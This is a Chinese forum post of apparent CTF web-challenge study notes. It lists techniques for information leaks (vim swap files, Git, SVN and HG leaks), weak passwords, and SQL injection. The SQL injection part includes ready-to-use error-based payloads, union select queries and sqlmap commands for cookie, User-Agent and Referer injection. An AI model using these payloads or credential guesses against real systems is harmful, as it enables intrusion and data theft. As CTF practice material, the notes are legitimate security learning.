博客

超级管理员

66637

帖子

11

回复

212

积分

楼主
发表于 2020-05-29 23:18:20 | 查看: 143 | 回复: 1

Web

HTTP协议

请求方式

 

302跳转

 

cookie

 

基础认证

 

响应包源代码

 

信息泄露

目录遍历

 

phpinfo

 

备份文件下载

网站源码

 

bak文件

 

vim缓存

下载下来放到linux中
在文件前面加的点(.)   .index.php.swp
然后运行 vi -r index.php
 

.DS_Store

记事本打开
 

Git泄露

Log

python git_extract.py
 

Stash

同上
 

Index

同上
 

SVN泄露

使用dvcs-ripper工具
 

HG泄露

使用dvcs-ripper工具
 
 

密码口令

弱口令

admin 123456
 

默认口令

百度搜索亿邮邮件网关默认口令
 
 
 

SQL注入

整数型注入

 

字符型注入

 

报错注入

extractvalue函数报错:       1 and ( extractvalue( 'anything',concat( '~', (select database()) ) ) );
updatexml函数报错:          1 and updatexml(1,concat(0x7e,(select database()),0x7e),1)
只能显示32位:
substr(字符串,开始位置,长度)
 

布尔盲注

sqlmap
sqlmap -u " " --dbs -technique B
 
数据库 sqli   表 flag   字段 flag
 

时间盲注

sqlmap
sqlmap -u " " --dbs -technique T
 
MySQL结构
-1 union select 1, group_concat(djbtjjrnuq) from sqli.pqfzaflkkt;
 
cookie注入
sqlmap -u " " --cookie "id=1" --level 2 --dbs 
 
UA注入
user-agent:   -1 union select 1,group_concat(hddxcgzzsv) from sqli.bgerzmdwpi;#
sqlmap: 
sqlmap -u " " --user-agent "123" --level 3 --dbs -technique U --dbms
 
Refer注入
同上,只不过在referer中输入SQL语句
 

XSS

反射型